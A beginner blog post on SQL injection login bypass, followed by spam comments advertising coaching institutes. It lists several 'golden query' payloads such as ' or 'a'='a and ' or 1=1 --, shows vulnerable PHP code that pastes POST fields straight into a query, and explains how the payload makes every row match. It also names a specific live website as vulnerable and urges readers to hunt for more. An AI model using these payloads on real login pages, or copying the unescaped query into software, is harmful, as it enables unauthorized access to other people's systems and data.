Structure Query Language
' or '1'='1 Injection
It is a technique to inject SQL query as an input possibly via web pages. Actually the logic to validate the authenticity of users is manipulated by using some extra sql query. Many web pages take parameters from web user, and make SQL query to the database. For example when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. It is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant to enter into the website.
This is my first article on SQL Injection. So, here we will see how to inject sql query in username and password fields to grant acess to the website. Not all websites are vulnerable to SQL Injection. We have to search websites those are vunerable to SQL Injection. This is simple.
Just enter ' or 'a'='a in username and password field and click login.List of golden query:
All the following codes can be used for SQL Injection.
- ' or 'a'='a
- ' or '1'='1
- ' or '0'='0
- ' or '007'='007
- ' or 'biti'='biti
- ' or 'technozone'='technozone
- ' or 1=1 --
Following PHP code is for validating the authenticity of the user.
$_SESSION['username']=$_POST["username"];
$_SESSION['password']=$_POST["password"];
// query for a user/pass match
$result=mysql_query("select * from users where username='" . $_SESSION['username'] . "' and password='" . $_SESSION['password'] . "'");
// retrieve number of rows resulted
$num=mysql_num_rows($result);
if($num < 1)
{
//Login Failed
header('Refresh: 2; URL=login.php?msg=login_failed');
}
else
{
//Login Sucessfull
header('Refresh: 2;URL=admin/admin_home.php?msg=login_success');
}
So, if we put ' or 'a'='a in username and password field the query for a user/pass matchwill become
$result=mysql_query("select * from users where username='' or 'a'='a' and password='' or 'a' ='a' );The above statement will now give all the data from the table users because both the conditions are true. And according to the logic of the user validation code the golden query ' or 'a'='a will help us to enter into the website.
I have found a vulnerable site where you can use this golden query ' or 'a'='a . This vulnerable website belongs to a institution related to IIT JEE Coaching. The site is www.fiitjee.com .
Friends search for more vulnerable site and inform them for the vulnerability.
Posts
6 comments:
Thanks for sharing this great blog. Your post is very helpful for me.
Best NDA Coaching in dehradun
NDA Coaching after 10th
NDA Coaching with Schooling in Dehradun
NDA Foundation Course in Dehradun
SSB Coaching in Dehradun
After effects course in dehradun
Graphic design, Animation, and VFX have become hot career options recently. As our civilization has evolved into a machine-dependent system, so have our advertising and communication needs. Graphic and audio-visual content is the best way to attract attention for brands and businesses, and as a result, there is a high demand for animators and graphic designers.
SSB coaching for NDA in dehradun
Union Public Service Commission releases notification for National Defence Academy and Naval Academy Examination in the month of January and July every year. 12th passed or appearing Candidates from the age group of 16 ½ to 19 ½ can apply this. A candidate must be an Unmarried male. The candidate joining National Defence Academy will undergo 4 years Educational & Military Training (3 Years at NDA & 1 Year at IMA/AFA/NA)and those joining Naval Academy will undergo 4 years B.Tech course and would be given an opportunity to join executive and technical branches of the Indian Navy subject to availability of vacancies.
Indian Sainik School website provides best and general guidance on what to consider when looking for the best military coaching institute.Review the coaching institute's course curriculum to ensure that it covers all the necessary subjects and topics required for the military entrance exams. The curriculum should be structured, well-planned, and up-to-date with the latest exam patterns and syllabus.
Also if you searching for best sainik and boarding schools in India you can visit our web site and for more information please email to us : indiansainikschool@gmail.com or call our contact number+91 9027028142
Post a Comment
Type here your comments